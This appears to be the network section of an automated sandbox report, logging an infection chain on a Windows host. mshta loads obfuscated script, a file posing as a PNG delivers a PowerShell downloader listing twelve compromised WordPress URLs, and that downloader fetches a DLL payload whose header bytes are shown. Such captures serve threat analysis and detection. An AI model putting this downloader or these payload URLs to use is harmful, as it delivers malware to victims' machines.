Jan 28, 2022 21:24:47.971502066 CET	49169	80	192.168.2.22	172.67.149.209
Jan 28, 2022 21:24:47.987519979 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:48.031068087 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:48.031097889 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:48.031115055 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:48.031130075 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:48.031141996 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:48.031183958 CET	49169	80	192.168.2.22	172.67.149.209
Jan 28, 2022 21:24:48.032617092 CET	49169	80	192.168.2.22	172.67.149.209
Jan 28, 2022 21:24:48.314838886 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.476866961 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.476942062 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.477128983 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.640506983 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685756922 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685779095 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685797930 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685817003 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685838938 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685878992 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685899973 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685899973 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.685905933 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.685919046 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685937881 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685939074 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.685957909 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.685973883 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.686116934 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.847829103 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.847847939 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.847940922 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.853611946 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.853631020 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.853689909 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.865048885 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.865084887 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.865138054 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.876492977 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.876511097 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.876574039 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.887865067 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.887885094 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.887969017 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.899410963 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.899446964 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.899490118 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.910604954 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.910628080 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.910718918 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.921982050 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.922005892 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.922056913 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.933341980 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.933367014 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.933449030 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:48.944802046 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.944828033 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:48.944977999 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:49.009958982 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:49.009994984 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:49.010195017 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:49.016185045 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:49.016225100 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:49.016339064 CET	49170	80	192.168.2.22	74.208.236.157
Jan 28, 2022 21:24:49.026963949 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:49.027000904 CET	80	49170	74.208.236.157	192.168.2.22
Jan 28, 2022 21:24:49.027045965 CET	49170	80	192.168.2.22	74.208.236.157

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 21:24:47.921374083 CET	52167	53	192.168.2.22	8.8.8.8
Jan 28, 2022 21:24:47.943814039 CET	53	52167	8.8.8.8	192.168.2.22
Jan 28, 2022 21:24:48.295170069 CET	50591	53	192.168.2.22	8.8.8.8
Jan 28, 2022 21:24:48.314129114 CET	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 21:24:47.921374083 CET	192.168.2.22	8.8.8.8	0xb743	Standard query (0)	kuyporn.com	A (IP address)	IN (0x0001)
Jan 28, 2022 21:24:48.295170069 CET	192.168.2.22	8.8.8.8	0x3abf	Standard query (0)	jeffreylubin.igclout.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 28, 2022 21:24:47.943814039 CET	8.8.8.8	192.168.2.22	0xb743	No error (0)	kuyporn.com	172.67.149.209	A (IP address)	IN (0x0001)
Jan 28, 2022 21:24:47.943814039 CET	8.8.8.8	192.168.2.22	0xb743	No error (0)	kuyporn.com	104.21.11.177	A (IP address)	IN (0x0001)
Jan 28, 2022 21:24:48.314129114 CET	8.8.8.8	192.168.2.22	0x3abf	No error (0)	jeffreylubin.igclout.com	74.208.236.157	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.240.118.168

kuyporn.com

jeffreylubin.igclout.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	91.240.118.168	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:24:41.280599117 CET	0	OUT	GET /qqw/aas/se.html HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.168 Connection: Keep-Alive
Jan 28, 2022 21:24:41.342391014 CET	2	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 28 Jan 2022 20:24:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 11230 Last-Modified: Wed, 26 Jan 2022 22:39:54 GMT Connection: keep-alive ETag: "61f1cdba-2bde" Accept-Ranges: bytes Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 76 4c 47 34 38 37 51 32 66 62 6e 57 62 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 64 33 66 55 68 51 42 66 55 57 33 30 33 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 64 33 66 55 68 51 42 66 55 57 33 30 33 5b 30 5d 3d 27 63 5c 31 36 31 5c 31 37 31 52 25 35 30 25 33 32 65 25 33 37 27 20 20 20 3b 76 4c 47 34 38 37 51 32 66 62 6e 57 62 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 5c 5c 7f 31 7f 36 7f 36 7f 61 7f 72 7f 25 7f 32 7f 30 7f 25 7f 37 7f 31 7f 79 7f 25 7f 33 7f 37 7d 25 7f 44 7d 1e 7d 5c 27 7f 32 7d 5c 27 7f 33 7f 42 7f 71 7d 18 7d 22 7d 25 7f 38 7d 28 7f 25 7f 35 7f 33 7d 21 7f 34 7d 21 7f 32 7f 25 7f 36 7f 39 7f 6e 7f 67 7d 1e 7f 45 7d 3d 7f 36 7f 72 7f 6f 7d 18 7f 35 7f 35 Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'\\166ar%20%71y%37}%D}}\'2}\'3Bq}}"}%8}(%53}!4}!2%69ng}E}=6ro}55

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	91.240.118.168	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:24:47.819864988 CET	13	OUT	GET /qqw/aas/se.png HTTP/1.1 Host: 91.240.118.168 Connection: Keep-Alive
Jan 28, 2022 21:24:47.878390074 CET	14	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 28 Jan 2022 20:24:47 GMT Content-Type: image/png Content-Length: 1178 Last-Modified: Wed, 26 Jan 2022 22:58:47 GMT Connection: keep-alive ETag: "61f1d227-49a" Accept-Ranges: bytes Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 6b 75 79 70 6f 72 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 58 53 73 35 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 65 66 66 72 65 79 6c 75 62 69 6e 2e 69 67 63 6c 6f 75 74 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 76 7a 4f 47 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 66 6c 79 62 75 73 74 72 61 76 65 6c 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 32 54 6a 55 48 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 64 6f 63 73 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 4a 4a 45 66 30 6b 45 41 35 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 77 61 6c 6c 61 63 65 62 72 61 64 6c 65 79 2e 63 6f 6d 2f 63 73 73 2f 59 63 44 63 39 32 37 53 4a 52 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 73 3a 2f 2f 61 6c 67 7a 6f 72 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 67 68 46 58 56 72 47 4c 45 68 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 63 6f 76 65 73 74 75 64 69 6f 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 33 7a 67 52 69 32 77 58 77 43 62 64 53 44 33 69 7a 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 6d 61 72 74 69 6e 73 61 6e 63 68 65 7a 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 51 70 46 44 4a 50 4d 59 34 39 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 6c 72 6f 69 65 79 65 63 65 6e 74 72 65 2e 6f 72 67 2f 63 67 69 2d 62 69 6e 2f 6c 34 32 73 6c 67 6d 66 38 6e 42 70 55 59 73 62 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 62 6c 75 77 6f 6d 2d 6d 69 6c 61 6e 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 46 45 6a 33 79 34 7a 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 68 61 69 72 65 70 6f 72 74 63 68 61 6e 6e 65 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 4b 61 57 5a 70 30 6f 64 6b 45 4f 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 73 61 63 69 2d 65 67 79 70 74 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 57 37 71 58 56 65 47 70 2f 27 3b 0d 0a 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://kuyporn.com/wp-content/XSs5/';$url2 = 'http://jeffreylubin.igclout.com/wp-admin/vzOG/';$url3 = 'http://flybustravel.com/cgi-bin/2TjUH/';$url4 = 'http://docs-construction.com/wp-admin/JJEf0kEA5/';$url5 = 'http://wallacebradley.com/css/YcDc927SJR/';$url6 = 'https://algzor.com/wp-includes/ghFXVrGLEh/';$url7 = 'https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/';$url8 = 'https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/';$url9 = 'https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/';$url10 = 'https://bluwom-milano.com/wp-content/FEj3y4z/';$url11 = 'https://thaireportchannel.com/wp-includes/KaWZp0odkEO/';$url12 = 'https://esaci-egypt.com/wp-includes/W7qXVeGp/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	172.67.149.209	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:24:47.971502066 CET	15	OUT	GET /wp-content/XSs5/ HTTP/1.1 Host: kuyporn.com Connection: Keep-Alive
Jan 28, 2022 21:24:48.031068087 CET	16	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 20:24:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qSUayrKTMdgpKbPQ4MXKGDydjrEdM6JjR77w73yoD7Idbj3svQ0ldi3DTevTgtnI4Vjbi%2FsT2YJJMR7zvBVjf%2Bq2XN13WF2AQ1YojjHcH3aBHu873%2BfMPbRbtm0n5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6d4cf243debe6964-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 30 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 Data Ascii: 10dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	74.208.236.157	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:24:48.477128983 CET	20	OUT	GET /wp-admin/vzOG/ HTTP/1.1 Host: jeffreylubin.igclout.com Connection: Keep-Alive
Jan 28, 2022 21:24:48.685756922 CET	22	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 557056 Connection: keep-alive Keep-Alive: timeout=15 Date: Fri, 28 Jan 2022 20:24:48 GMT Server: Apache Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 28 Jan 2022 20:24:48 GMT Content-Disposition: attachment; filename="NsLUiuT.dll" Content-Transfer-Encoding: binary Set-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/ Last-Modified: Fri, 28 Jan 2022 20:24:48 GMT X-Frame-Options: SAMEORIGIN Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 